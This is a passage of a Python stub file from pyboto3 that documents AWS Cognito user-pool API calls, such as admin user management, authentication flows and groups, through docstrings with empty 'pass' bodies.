653a0db2b00b06708334431da8f169d1f7c7734f
|
[
"MIT"
] | null | null | null |
pyboto3/cognitoidentityprovider.py
|
thecraftman/pyboto3
|
653a0db2b00b06708334431da8f169d1f7c7734f
|
[
"MIT"
] | null | null | null |
'''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def add_custom_attributes(UserPoolId=None, CustomAttributes=None):
    """
    Adds additional user attributes to the user pool schema.
    See also: AWS API Documentation

    :type UserPoolId: string
    :param UserPoolId: [REQUIRED] The user pool ID for the user pool
        where you want to add custom attributes.
    :type CustomAttributes: list
    :param CustomAttributes: [REQUIRED] An array of custom attribute
        definitions. Each is a dict with keys: Name (string),
        AttributeDataType ('String'|'Number'|'DateTime'|'Boolean'),
        DeveloperOnlyAttribute (boolean), Mutable (boolean),
        Required (boolean), and optional NumberAttributeConstraints
        (MinValue/MaxValue strings) or StringAttributeConstraints
        (MinLength/MaxLength strings).
    :rtype: dict
    :return: {}
    """
    pass
def admin_add_user_to_group(UserPoolId=None, Username=None, GroupName=None):
    """
    Adds the specified user to the specified group.
    Requires developer credentials.
    See also: AWS API Documentation

    :type UserPoolId: string
    :param UserPoolId: [REQUIRED] The user pool ID for the user pool.
    :type Username: string
    :param Username: [REQUIRED] The username for the user.
    :type GroupName: string
    :param GroupName: [REQUIRED] The group name.
    """
    pass
def admin_confirm_sign_up(UserPoolId=None, Username=None):
    """
    Confirms user registration as an admin without using a confirmation
    code. Works on any user. Requires developer credentials.
    See also: AWS API Documentation

    :type UserPoolId: string
    :param UserPoolId: [REQUIRED] The user pool ID for which you want to
        confirm user registration.
    :type Username: string
    :param Username: [REQUIRED] The user name for which you want to
        confirm user registration.
    :rtype: dict
    :return: {}
    """
    pass
def admin_create_user(UserPoolId=None, Username=None, UserAttributes=None, ValidationData=None, TemporaryPassword=None, ForceAliasCreation=None, MessageAction=None, DesiredDeliveryMediums=None):
    """
    Creates a new user in the specified user pool and sends a welcome
    message via email or phone (SMS), based on the template configured
    in CreateUserPool or UpdateUserPool. Requires developer credentials.
    See also: AWS API Documentation

    :type UserPoolId: string
    :param UserPoolId: [REQUIRED] The user pool ID for the user pool
        where the user will be created.
    :type Username: string
    :param Username: [REQUIRED] The username for the user. Must be a
        unique UTF-8 string between 1 and 128 characters; it cannot be
        changed after the user is created.
    :type UserAttributes: list
    :param UserAttributes: Name/Value pairs to set for the new user.
        Required attributes (per the pool schema) must be supplied here
        or by the user at sign-up. Prepend custom: for custom
        attributes. To send an invitation, supply the user's email
        and/or phone_number; email_verified / phone_number_verified may
        be set to True here.
    :type ValidationData: list
    :param ValidationData: Name/Value pairs passed to the Pre Sign-up
        Lambda trigger for custom validation (e.g. restricting sign-up
        by domain). This data is not persisted.
    :type TemporaryPassword: string
    :param TemporaryPassword: The user's temporary password, conforming
        to the pool's password policy. Valid only once, and only until
        the account expiration limit; if omitted, Amazon Cognito
        generates one. To reset an expired account, call
        AdminCreateUser again with MessageAction='RESEND'.
    :type ForceAliasCreation: boolean
    :param ForceAliasCreation: Only used when phone_number_verified or
        email_verified is True. If True, migrates an existing alias
        (email/phone) from another user to this one; if False (the
        default), an AliasExistsException is raised when the alias
        already exists.
    :type MessageAction: string
    :param MessageAction: 'RESEND' to resend the invitation and reset
        the expiration limit, or 'SUPPRESS' to skip sending. Only one
        value can be specified.
    :type DesiredDeliveryMediums: list
    :param DesiredDeliveryMediums: 'EMAIL' and/or 'SMS' (default 'SMS')
        for delivering the welcome message.
    :rtype: dict
    :return: {
        'User': {
            'Username': 'string',
            'Attributes': [{'Name': 'string', 'Value': 'string'}, ...],
            'UserCreateDate': datetime(2015, 1, 1),
            'UserLastModifiedDate': datetime(2015, 1, 1),
            'Enabled': True|False,
            'UserStatus': 'UNCONFIRMED'|'CONFIRMED'|'ARCHIVED'|'COMPROMISED'|'UNKNOWN'|'RESET_REQUIRED'|'FORCE_CHANGE_PASSWORD',
            'MFAOptions': [{'DeliveryMedium': 'SMS'|'EMAIL', 'AttributeName': 'string'}, ...]
        }
    }

    :returns:
    UNCONFIRMED - User has been created but not confirmed.
    CONFIRMED - User has been confirmed.
    ARCHIVED - User is no longer active.
    COMPROMISED - User is disabled due to a potential security threat.
    UNKNOWN - User status is not known.
    """
    pass
def admin_delete_user(UserPoolId=None, Username=None):
    """
    Deletes a user as an administrator. Works on any user.
    Requires developer credentials.
    See also: AWS API Documentation

    :type UserPoolId: string
    :param UserPoolId: [REQUIRED] The user pool ID for the user pool
        where you want to delete the user.
    :type Username: string
    :param Username: [REQUIRED] The user name of the user you wish to
        delete.
    """
    pass
def admin_delete_user_attributes(UserPoolId=None, Username=None, UserAttributeNames=None):
    """
    Deletes the user attributes in a user pool as an administrator.
    Works on any user. Requires developer credentials.
    See also: AWS API Documentation

    :type UserPoolId: string
    :param UserPoolId: [REQUIRED] The user pool ID for the user pool
        where you want to delete user attributes.
    :type Username: string
    :param Username: [REQUIRED] The user name of the user from which you
        would like to delete attributes.
    :type UserAttributeNames: list
    :param UserAttributeNames: [REQUIRED] An array of attribute name
        strings to delete. Prepend custom: for custom attributes.
    :rtype: dict
    :return: {}
    """
    pass
def admin_disable_user(UserPoolId=None, Username=None):
    """
    Disables the specified user as an administrator. Works on any user.
    Requires developer credentials.
    See also: AWS API Documentation

    :type UserPoolId: string
    :param UserPoolId: [REQUIRED] The user pool ID for the user pool
        where you want to disable the user.
    :type Username: string
    :param Username: [REQUIRED] The user name of the user you wish to
        disable.
    :rtype: dict
    :return: {}
    """
    pass
def admin_enable_user(UserPoolId=None, Username=None):
    """
    Enables the specified user as an administrator. Works on any user.
    Requires developer credentials.
    See also: AWS API Documentation

    :type UserPoolId: string
    :param UserPoolId: [REQUIRED] The user pool ID for the user pool
        where you want to enable the user.
    :type Username: string
    :param Username: [REQUIRED] The user name of the user you wish to
        enable.
    :rtype: dict
    :return: {}
    """
    pass
def admin_forget_device(UserPoolId=None, Username=None, DeviceKey=None):
    """
    Forgets the device, as an administrator.
    Requires developer credentials.
    See also: AWS API Documentation

    :type UserPoolId: string
    :param UserPoolId: [REQUIRED] The user pool ID.
    :type Username: string
    :param Username: [REQUIRED] The user name.
    :type DeviceKey: string
    :param DeviceKey: [REQUIRED] The device key.
    """
    pass
def admin_get_device(DeviceKey=None, UserPoolId=None, Username=None):
    """
    Gets the device, as an administrator.
    Requires developer credentials.
    See also: AWS API Documentation

    :type DeviceKey: string
    :param DeviceKey: [REQUIRED] The device key.
    :type UserPoolId: string
    :param UserPoolId: [REQUIRED] The user pool ID.
    :type Username: string
    :param Username: [REQUIRED] The user name.
    :rtype: dict
    :return: {
        'Device': {
            'DeviceKey': 'string',
            'DeviceAttributes': [{'Name': 'string', 'Value': 'string'}, ...],
            'DeviceCreateDate': datetime(2015, 1, 1),
            'DeviceLastModifiedDate': datetime(2015, 1, 1),
            'DeviceLastAuthenticatedDate': datetime(2015, 1, 1)
        }
    }
    """
    pass
def admin_get_user(UserPoolId=None, Username=None):
    """
    Gets the specified user by user name in a user pool as an
    administrator. Works on any user. Requires developer credentials.
    See also: AWS API Documentation

    :type UserPoolId: string
    :param UserPoolId: [REQUIRED] The user pool ID for the user pool
        where you want to get information about the user.
    :type Username: string
    :param Username: [REQUIRED] The user name of the user you wish to
        retrieve.
    :rtype: dict
    :return: {
        'Username': 'string',
        'UserAttributes': [{'Name': 'string', 'Value': 'string'}, ...],
        'UserCreateDate': datetime(2015, 1, 1),
        'UserLastModifiedDate': datetime(2015, 1, 1),
        'Enabled': True|False,
        'UserStatus': 'UNCONFIRMED'|'CONFIRMED'|'ARCHIVED'|'COMPROMISED'|'UNKNOWN'|'RESET_REQUIRED'|'FORCE_CHANGE_PASSWORD',
        'MFAOptions': [{'DeliveryMedium': 'SMS'|'EMAIL', 'AttributeName': 'string'}, ...]
    }

    :returns:
    UNCONFIRMED - User has been created but not confirmed.
    CONFIRMED - User has been confirmed.
    ARCHIVED - User is no longer active.
    COMPROMISED - User is disabled due to a potential security threat.
    UNKNOWN - User status is not known.
    """
    pass
def admin_initiate_auth(UserPoolId=None, ClientId=None, AuthFlow=None, AuthParameters=None, ClientMetadata=None):
    """
    Initiates the authentication flow, as an administrator.
    Requires developer credentials.
    See also: AWS API Documentation

    :example: response = client.admin_initiate_auth(
        UserPoolId='string',
        ClientId='string',
        AuthFlow='USER_SRP_AUTH'|'REFRESH_TOKEN_AUTH'|'REFRESH_TOKEN'|'CUSTOM_AUTH'|'ADMIN_NO_SRP_AUTH',
        AuthParameters={
            'string': 'string'
        },
        ClientMetadata={
            'string': 'string'
        }
    )

    :type UserPoolId: string
    :param UserPoolId: [REQUIRED]
        The ID of the Amazon Cognito user pool.
    :type ClientId: string
    :param ClientId: [REQUIRED]
        The app client ID.
    :type AuthFlow: string
    :param AuthFlow: [REQUIRED]
        The authentication flow for this call to execute. The API action will depend on this value. For example:
        REFRESH_TOKEN_AUTH will take in a valid refresh token and return new tokens.
        USER_SRP_AUTH will take in USERNAME and SRP_A and return the SRP variables to be used for next challenge execution.
        Valid values include:
        USER_SRP_AUTH : Authentication flow for the Secure Remote Password (SRP) protocol.
        REFRESH_TOKEN_AUTH /REFRESH_TOKEN : Authentication flow for refreshing the access token and ID token by supplying a valid refresh token.
        CUSTOM_AUTH : Custom authentication flow.
        ADMIN_NO_SRP_AUTH : Non-SRP authentication flow; you can pass in the USERNAME and PASSWORD directly if the flow is enabled for calling the app client.
    :type AuthParameters: dict
    :param AuthParameters: The authentication parameters. These are inputs corresponding to the AuthFlow that you are invoking. The required values depend on the value of AuthFlow :
        For USER_SRP_AUTH : USERNAME (required), SRP_A (required), SECRET_HASH (required if the app client is configured with a client secret), DEVICE_KEY
        For REFRESH_TOKEN_AUTH/REFRESH_TOKEN : USERNAME (required), SECRET_HASH (required if the app client is configured with a client secret), REFRESH_TOKEN (required), DEVICE_KEY
        For ADMIN_NO_SRP_AUTH : USERNAME (required), SECRET_HASH (if app client is configured with client secret), PASSWORD (required), DEVICE_KEY
        For CUSTOM_AUTH : USERNAME (required), SECRET_HASH (if app client is configured with client secret), DEVICE_KEY
        (string) --
        (string) --
    :type ClientMetadata: dict
    :param ClientMetadata: This is a random key-value pair map which can contain any key and will be passed to your PreAuthentication Lambda trigger as-is. It can be used to implement additional validations around authentication.
        (string) --
        (string) --
    :rtype: dict
    :return: {
        'ChallengeName': 'SMS_MFA'|'PASSWORD_VERIFIER'|'CUSTOM_CHALLENGE'|'DEVICE_SRP_AUTH'|'DEVICE_PASSWORD_VERIFIER'|'ADMIN_NO_SRP_AUTH'|'NEW_PASSWORD_REQUIRED',
        'Session': 'string',
        'ChallengeParameters': {
            'string': 'string'
        },
        'AuthenticationResult': {
            'AccessToken': 'string',
            'ExpiresIn': 123,
            'TokenType': 'string',
            'RefreshToken': 'string',
            'IdToken': 'string',
            'NewDeviceMetadata': {
                'DeviceKey': 'string',
                'DeviceGroupKey': 'string'
            }
        }
    }
    :returns:
        SMS_MFA : Next challenge is to supply an SMS_MFA_CODE , delivered via SMS.
        PASSWORD_VERIFIER : Next challenge is to supply PASSWORD_CLAIM_SIGNATURE , PASSWORD_CLAIM_SECRET_BLOCK , and TIMESTAMP after the client-side SRP calculations.
        CUSTOM_CHALLENGE : This is returned if your custom authentication flow determines that the user should pass another challenge before tokens are issued.
        DEVICE_SRP_AUTH : If device tracking was enabled on your user pool and the previous challenges were passed, this challenge is returned so that Amazon Cognito can start tracking this device.
        DEVICE_PASSWORD_VERIFIER : Similar to PASSWORD_VERIFIER , but for devices only.
        ADMIN_NO_SRP_AUTH : This is returned if you need to authenticate with USERNAME and PASSWORD directly. An app client must be enabled to use this flow.
        NEW_PASSWORD_REQUIRED : For users which are required to change their passwords after successful first login. This challenge should be passed with NEW_PASSWORD and any other required attributes.
    """
    # Documentation stub: no executable implementation.
    # NOTE(review): original generated text said "SRPA"; corrected to SRP_A per
    # the AdminInitiateAuth API reference (generation had dropped the underscore).
    pass
def admin_list_devices(UserPoolId=None, Username=None, Limit=None, PaginationToken=None):
    """
    Lists devices, as an administrator.
    Requires developer credentials.
    See also: AWS API Documentation

    :example: response = client.admin_list_devices(
        UserPoolId='string',
        Username='string',
        Limit=123,
        PaginationToken='string'
    )

    :type UserPoolId: string
    :param UserPoolId: [REQUIRED]
        The user pool ID.
    :type Username: string
    :param Username: [REQUIRED]
        The user name.
    :type Limit: integer
    :param Limit: The limit of the devices request.
    :type PaginationToken: string
    :param PaginationToken: The pagination token.
    :rtype: dict
    :return: {
        'Devices': [
            {
                'DeviceKey': 'string',
                'DeviceAttributes': [
                    {
                        'Name': 'string',
                        'Value': 'string'
                    },
                ],
                'DeviceCreateDate': datetime(2015, 1, 1),
                'DeviceLastModifiedDate': datetime(2015, 1, 1),
                'DeviceLastAuthenticatedDate': datetime(2015, 1, 1)
            },
        ],
        'PaginationToken': 'string'
    }
    """
    # Documentation stub: no executable implementation.
    pass
def admin_list_groups_for_user(Username=None, UserPoolId=None, Limit=None, NextToken=None):
    """
    Lists the groups that the user belongs to.
    Requires developer credentials.
    See also: AWS API Documentation

    :example: response = client.admin_list_groups_for_user(
        Username='string',
        UserPoolId='string',
        Limit=123,
        NextToken='string'
    )

    :type Username: string
    :param Username: [REQUIRED]
        The username for the user.
    :type UserPoolId: string
    :param UserPoolId: [REQUIRED]
        The user pool ID for the user pool.
    :type Limit: integer
    :param Limit: The limit of the request to list groups.
    :type NextToken: string
    :param NextToken: An identifier that was returned from the previous call to this operation, which can be used to return the next set of items in the list.
    :rtype: dict
    :return: {
        'Groups': [
            {
                'GroupName': 'string',
                'UserPoolId': 'string',
                'Description': 'string',
                'RoleArn': 'string',
                'Precedence': 123,
                'LastModifiedDate': datetime(2015, 1, 1),
                'CreationDate': datetime(2015, 1, 1)
            },
        ],
        'NextToken': 'string'
    }
    """
    # Documentation stub: no executable implementation.
    pass
def admin_remove_user_from_group(UserPoolId=None, Username=None, GroupName=None):
    """
    Removes the specified user from the specified group.
    Requires developer credentials.
    See also: AWS API Documentation

    :example: response = client.admin_remove_user_from_group(
        UserPoolId='string',
        Username='string',
        GroupName='string'
    )

    :type UserPoolId: string
    :param UserPoolId: [REQUIRED]
        The user pool ID for the user pool.
    :type Username: string
    :param Username: [REQUIRED]
        The username for the user.
    :type GroupName: string
    :param GroupName: [REQUIRED]
        The group name.
    """
    # Documentation stub: no executable implementation.
    pass
def admin_reset_user_password(UserPoolId=None, Username=None):
    """
    Resets the specified user's password in a user pool as an administrator. Works on any user.
    When a developer calls this API, the current password is invalidated, so it must be changed. If a user tries to sign in after the API is called, the app will get a PasswordResetRequiredException exception back and should direct the user down the flow to reset the password, which is the same as the forgot password flow. In addition, if the user pool has phone verification selected and a verified phone number exists for the user, or if email verification is selected and a verified email exists for the user, calling this API will also result in sending a message to the end user with the code to change their password.
    Requires developer credentials.
    See also: AWS API Documentation

    :example: response = client.admin_reset_user_password(
        UserPoolId='string',
        Username='string'
    )

    :type UserPoolId: string
    :param UserPoolId: [REQUIRED]
        The user pool ID for the user pool where you want to reset the user's password.
    :type Username: string
    :param Username: [REQUIRED]
        The user name of the user whose password you wish to reset.
    :rtype: dict
    :return: {}
    """
    # Documentation stub: no executable implementation.
    pass
def admin_respond_to_auth_challenge(UserPoolId=None, ClientId=None, ChallengeName=None, ChallengeResponses=None, Session=None):
    """
    Responds to an authentication challenge, as an administrator.
    Requires developer credentials.
    See also: AWS API Documentation

    :example: response = client.admin_respond_to_auth_challenge(
        UserPoolId='string',
        ClientId='string',
        ChallengeName='SMS_MFA'|'PASSWORD_VERIFIER'|'CUSTOM_CHALLENGE'|'DEVICE_SRP_AUTH'|'DEVICE_PASSWORD_VERIFIER'|'ADMIN_NO_SRP_AUTH'|'NEW_PASSWORD_REQUIRED',
        ChallengeResponses={
            'string': 'string'
        },
        Session='string'
    )

    :type UserPoolId: string
    :param UserPoolId: [REQUIRED]
        The ID of the Amazon Cognito user pool.
    :type ClientId: string
    :param ClientId: [REQUIRED]
        The app client ID.
    :type ChallengeName: string
    :param ChallengeName: [REQUIRED]
        The challenge name. For more information, see AdminInitiateAuth .
    :type ChallengeResponses: dict
    :param ChallengeResponses: The challenge responses. These are inputs corresponding to the value of ChallengeName , for example:
        SMS_MFA : SMS_MFA_CODE , USERNAME , SECRET_HASH (if app client is configured with client secret).
        PASSWORD_VERIFIER : PASSWORD_CLAIM_SIGNATURE , PASSWORD_CLAIM_SECRET_BLOCK , TIMESTAMP , USERNAME , SECRET_HASH (if app client is configured with client secret).
        ADMIN_NO_SRP_AUTH : PASSWORD , USERNAME , SECRET_HASH (if app client is configured with client secret).
        NEW_PASSWORD_REQUIRED : NEW_PASSWORD , any other required attributes, USERNAME , SECRET_HASH (if app client is configured with client secret).
        The value of the USERNAME attribute must be the user's actual username, not an alias (such as email address or phone number). To make this easier, the AdminInitiateAuth response includes the actual username value in the USER_ID_FOR_SRP attribute, even if you specified an alias in your call to AdminInitiateAuth .
        (string) --
        (string) --
    :type Session: string
    :param Session: The session which should be passed both ways in challenge-response calls to the service. If InitiateAuth or RespondToAuthChallenge API call determines that the caller needs to go through another challenge, they return a session with other challenge parameters. This session should be passed as it is to the next RespondToAuthChallenge API call.
    :rtype: dict
    :return: {
        'ChallengeName': 'SMS_MFA'|'PASSWORD_VERIFIER'|'CUSTOM_CHALLENGE'|'DEVICE_SRP_AUTH'|'DEVICE_PASSWORD_VERIFIER'|'ADMIN_NO_SRP_AUTH'|'NEW_PASSWORD_REQUIRED',
        'Session': 'string',
        'ChallengeParameters': {
            'string': 'string'
        },
        'AuthenticationResult': {
            'AccessToken': 'string',
            'ExpiresIn': 123,
            'TokenType': 'string',
            'RefreshToken': 'string',
            'IdToken': 'string',
            'NewDeviceMetadata': {
                'DeviceKey': 'string',
                'DeviceGroupKey': 'string'
            }
        }
    }
    :returns:
        (string) --
        (string) --
    """
    # Documentation stub: no executable implementation.
    # NOTE(review): original generated text fused "USERNAME" and "USER_ID_FOR_SRP"
    # into "USERNAMEUSER_ID_FOR_SRP"; de-garbled per the AdminRespondToAuthChallenge
    # API reference.
    pass
def admin_set_user_settings(UserPoolId=None, Username=None, MFAOptions=None):
    """
    Sets all the user settings for a specified user name. Works on any user.
    Requires developer credentials.
    See also: AWS API Documentation

    :example: response = client.admin_set_user_settings(
        UserPoolId='string',
        Username='string',
        MFAOptions=[
            {
                'DeliveryMedium': 'SMS'|'EMAIL',
                'AttributeName': 'string'
            },
        ]
    )

    :type UserPoolId: string
    :param UserPoolId: [REQUIRED]
        The user pool ID for the user pool where you want to set the user's settings, such as MFA options.
    :type Username: string
    :param Username: [REQUIRED]
        The user name of the user for whom you wish to set user settings.
    :type MFAOptions: list
    :param MFAOptions: [REQUIRED]
        Specifies the options for MFA (e.g., email or phone number).
        (dict) --Specifies the different settings for multi-factor authentication (MFA).
        DeliveryMedium (string) --The delivery medium (email message or SMS message) to send the MFA code.
        AttributeName (string) --The attribute name of the MFA option type.
    :rtype: dict
    :return: {}
    """
    # Documentation stub: no executable implementation.
    pass
def admin_update_device_status(UserPoolId=None, Username=None, DeviceKey=None, DeviceRememberedStatus=None):
    """
    Updates the device status as an administrator.
    Requires developer credentials.
    See also: AWS API Documentation

    :example: response = client.admin_update_device_status(
        UserPoolId='string',
        Username='string',
        DeviceKey='string',
        DeviceRememberedStatus='remembered'|'not_remembered'
    )

    :type UserPoolId: string
    :param UserPoolId: [REQUIRED]
        The user pool ID.
    :type Username: string
    :param Username: [REQUIRED]
        The user name.
    :type DeviceKey: string
    :param DeviceKey: [REQUIRED]
        The device key.
    :type DeviceRememberedStatus: string
    :param DeviceRememberedStatus: The status indicating whether a device has been remembered or not.
    :rtype: dict
    :return: {}
    """
    # Documentation stub: no executable implementation.
    pass
def admin_update_user_attributes(UserPoolId=None, Username=None, UserAttributes=None):
    """
    Updates the specified user's attributes, including developer attributes, as an administrator. Works on any user.
    For custom attributes, you must prepend the custom: prefix to the attribute name.
    In addition to updating user attributes, this API can also be used to mark phone and email as verified.
    Requires developer credentials.
    See also: AWS API Documentation

    :example: response = client.admin_update_user_attributes(
        UserPoolId='string',
        Username='string',
        UserAttributes=[
            {
                'Name': 'string',
                'Value': 'string'
            },
        ]
    )

    :type UserPoolId: string
    :param UserPoolId: [REQUIRED]
        The user pool ID for the user pool where you want to update user attributes.
    :type Username: string
    :param Username: [REQUIRED]
        The user name of the user for whom you want to update user attributes.
    :type UserAttributes: list
    :param UserAttributes: [REQUIRED]
        An array of name-value pairs representing user attributes.
        For custom attributes, you must prepend the custom: prefix to the attribute name.
        (dict) --Specifies whether the attribute is standard or custom.
        Name (string) -- [REQUIRED]The name of the attribute.
        Value (string) --The value of the attribute.
    :rtype: dict
    :return: {}
    """
    # Documentation stub: no executable implementation.
    pass
def admin_user_global_sign_out(UserPoolId=None, Username=None):
    """
    Signs out users from all devices, as an administrator.
    Requires developer credentials.
    See also: AWS API Documentation

    :example: response = client.admin_user_global_sign_out(
        UserPoolId='string',
        Username='string'
    )

    :type UserPoolId: string
    :param UserPoolId: [REQUIRED]
        The user pool ID.
    :type Username: string
    :param Username: [REQUIRED]
        The user name.
    :rtype: dict
    :return: {}
    """
    # Documentation stub: no executable implementation.
    pass
def can_paginate(operation_name=None):
    """
    Check if an operation can be paginated.

    :type operation_name: string
    :param operation_name: The operation name. This is the same name
        as the method name on the client. For example, if the
        method name is create_foo, and you'd normally invoke the
        operation as client.create_foo(**kwargs), if the
        create_foo operation can be paginated, you can use the
        call client.get_paginator('create_foo').
    :rtype: boolean
    :return: True if the operation can be paginated, False otherwise
        (per the boto3 client.can_paginate documentation).
    """
    # Documentation stub: no executable implementation.
    pass
def change_password(PreviousPassword=None, ProposedPassword=None, AccessToken=None):
    """
    Changes the password for a specified user in a user pool.
    See also: AWS API Documentation

    :example: response = client.change_password(
        PreviousPassword='string',
        ProposedPassword='string',
        AccessToken='string'
    )

    :type PreviousPassword: string
    :param PreviousPassword: [REQUIRED]
        The old password in the change password request.
    :type ProposedPassword: string
    :param ProposedPassword: [REQUIRED]
        The new password in the change password request.
    :type AccessToken: string
    :param AccessToken: [REQUIRED]
        The access token in the change password request.
    :rtype: dict
    :return: {}
    """
    # Documentation stub: no executable implementation.
    pass
def confirm_device(AccessToken=None, DeviceKey=None, DeviceSecretVerifierConfig=None, DeviceName=None):
    """
    Confirms tracking of the device. This API call is the call that begins device tracking.
    See also: AWS API Documentation

    :example: response = client.confirm_device(
        AccessToken='string',
        DeviceKey='string',
        DeviceSecretVerifierConfig={
            'PasswordVerifier': 'string',
            'Salt': 'string'
        },
        DeviceName='string'
    )

    :type AccessToken: string
    :param AccessToken: [REQUIRED]
        The access token.
    :type DeviceKey: string
    :param DeviceKey: [REQUIRED]
        The device key.
    :type DeviceSecretVerifierConfig: dict
    :param DeviceSecretVerifierConfig: The configuration of the device secret verifier.
        PasswordVerifier (string) --The password verifier.
        Salt (string) --The salt.
    :type DeviceName: string
    :param DeviceName: The device name.
    :rtype: dict
    :return: {
        'UserConfirmationNecessary': True|False
    }
    """
    # Documentation stub: no executable implementation.
    pass
def confirm_forgot_password(ClientId=None, SecretHash=None, Username=None, ConfirmationCode=None, Password=None):
    """
    Allows a user to enter a confirmation code to reset a forgotten password.
    See also: AWS API Documentation

    :example: response = client.confirm_forgot_password(
        ClientId='string',
        SecretHash='string',
        Username='string',
        ConfirmationCode='string',
        Password='string'
    )

    :type ClientId: string
    :param ClientId: [REQUIRED]
        The ID of the client associated with the user pool.
    :type SecretHash: string
    :param SecretHash: A keyed-hash message authentication code (HMAC) calculated using the secret key of a user pool client and username plus the client ID in the message.
    :type Username: string
    :param Username: [REQUIRED]
        The user name of the user for whom you want to enter a code to retrieve a forgotten password.
    :type ConfirmationCode: string
    :param ConfirmationCode: [REQUIRED]
        The confirmation code sent by a user's request to retrieve a forgotten password. For more information, see ForgotPassword
    :type Password: string
    :param Password: [REQUIRED]
        The password sent by a user's request to retrieve a forgotten password.
    :rtype: dict
    :return: {}
    """
    # Documentation stub: no executable implementation.
    pass
def confirm_sign_up(ClientId=None, SecretHash=None, Username=None, ConfirmationCode=None, ForceAliasCreation=None):
    """
    Confirms registration of a user and handles the existing alias from a previous user.
    See also: AWS API Documentation

    :example: response = client.confirm_sign_up(
        ClientId='string',
        SecretHash='string',
        Username='string',
        ConfirmationCode='string',
        ForceAliasCreation=True|False
    )

    :type ClientId: string
    :param ClientId: [REQUIRED]
        The ID of the client associated with the user pool.
    :type SecretHash: string
    :param SecretHash: A keyed-hash message authentication code (HMAC) calculated using the secret key of a user pool client and username plus the client ID in the message.
    :type Username: string
    :param Username: [REQUIRED]
        The user name of the user whose registration you wish to confirm.
    :type ConfirmationCode: string
    :param ConfirmationCode: [REQUIRED]
        The confirmation code sent by a user's request to confirm registration.
    :type ForceAliasCreation: boolean
    :param ForceAliasCreation: Boolean to be specified to force user confirmation irrespective of existing alias. By default set to False . If this parameter is set to True and the phone number/email used for sign up confirmation already exists as an alias with a different user, the API call will migrate the alias from the previous user to the newly created user being confirmed. If set to False , the API will throw an AliasExistsException error.
    :rtype: dict
    :return: {}
    """
    # Documentation stub: no executable implementation.
    pass
def create_group(GroupName=None, UserPoolId=None, Description=None, RoleArn=None, Precedence=None):
    """
    Creates a new group in the specified user pool.
    Requires developer credentials.
    See also: AWS API Documentation

    :example: response = client.create_group(
        GroupName='string',
        UserPoolId='string',
        Description='string',
        RoleArn='string',
        Precedence=123
    )

    :type GroupName: string
    :param GroupName: [REQUIRED]
        The name of the group. Must be unique.
    :type UserPoolId: string
    :param UserPoolId: [REQUIRED]
        The user pool ID for the user pool.
    :type Description: string
    :param Description: A string containing the description of the group.
    :type RoleArn: string
    :param RoleArn: The role ARN for the group.
    :type Precedence: integer
    :param Precedence: A nonnegative integer value that specifies the precedence of this group relative to the other groups that a user can belong to in the user pool. Zero is the highest precedence value. Groups with lower Precedence values take precedence over groups with higher or null Precedence values. If a user belongs to two or more groups, it is the group with the lowest precedence value whose role ARN will be used in the cognito:roles and cognito:preferred_role claims in the user's tokens.
        Two groups can have the same Precedence value. If this happens, neither group takes precedence over the other. If two groups with the same Precedence have the same role ARN, that role is used in the cognito:preferred_role claim in tokens for users in each group. If the two groups have different role ARNs, the cognito:preferred_role claim is not set in users' tokens.
        The default Precedence value is null.
    :rtype: dict
    :return: {
        'Group': {
            'GroupName': 'string',
            'UserPoolId': 'string',
            'Description': 'string',
            'RoleArn': 'string',
            'Precedence': 123,
            'LastModifiedDate': datetime(2015, 1, 1),
            'CreationDate': datetime(2015, 1, 1)
        }
    }
    """
    # Documentation stub: no executable implementation.
    pass
def create_identity_provider(UserPoolId=None, ProviderName=None, ProviderType=None, ProviderDetails=None, AttributeMapping=None, IdpIdentifiers=None):
    """
    Creates an identity provider for a user pool.
    See also: AWS API Documentation

    :example: response = client.create_identity_provider(
        UserPoolId='string',
        ProviderName='string',
        ProviderType='SAML',
        ProviderDetails={
            'string': 'string'
        },
        AttributeMapping={
            'string': 'string'
        },
        IdpIdentifiers=[
            'string',
        ]
    )

    :type UserPoolId: string
    :param UserPoolId: [REQUIRED]
        The user pool ID.
    :type ProviderName: string
    :param ProviderName: [REQUIRED]
        The identity provider name.
    :type ProviderType: string
    :param ProviderType: [REQUIRED]
        The identity provider type.
    :type ProviderDetails: dict
    :param ProviderDetails: [REQUIRED]
        The identity provider details, such as MetadataURL and MetadataFile .
        (string) --
        (string) --
    :type AttributeMapping: dict
    :param AttributeMapping: A mapping of identity provider attributes to standard and custom user pool attributes.
        (string) --
        (string) --
    :type IdpIdentifiers: list
    :param IdpIdentifiers: A list of identity provider identifiers.
        (string) --
    :rtype: dict
    :return: {
        'IdentityProvider': {
            'UserPoolId': 'string',
            'ProviderName': 'string',
            'ProviderType': 'SAML',
            'ProviderDetails': {
                'string': 'string'
            },
            'AttributeMapping': {
                'string': 'string'
            },
            'IdpIdentifiers': [
                'string',
            ],
            'LastModifiedDate': datetime(2015, 1, 1),
            'CreationDate': datetime(2015, 1, 1)
        }
    }
    :returns:
        (string) --
        (string) --
    """
    # Documentation stub: no executable implementation.
    pass
def create_user_import_job(JobName=None, UserPoolId=None, CloudWatchLogsRoleArn=None):
    """
    Creates the user import job.
    See also: AWS API Documentation

    :example: response = client.create_user_import_job(
        JobName='string',
        UserPoolId='string',
        CloudWatchLogsRoleArn='string'
    )

    :type JobName: string
    :param JobName: [REQUIRED]
        The job name for the user import job.
    :type UserPoolId: string
    :param UserPoolId: [REQUIRED]
        The user pool ID for the user pool that the users are being imported into.
    :type CloudWatchLogsRoleArn: string
    :param CloudWatchLogsRoleArn: [REQUIRED]
        The role ARN for the Amazon CloudWatch Logging role for the user import job.
    :rtype: dict
    :return: {
        'UserImportJob': {
            'JobName': 'string',
            'JobId': 'string',
            'UserPoolId': 'string',
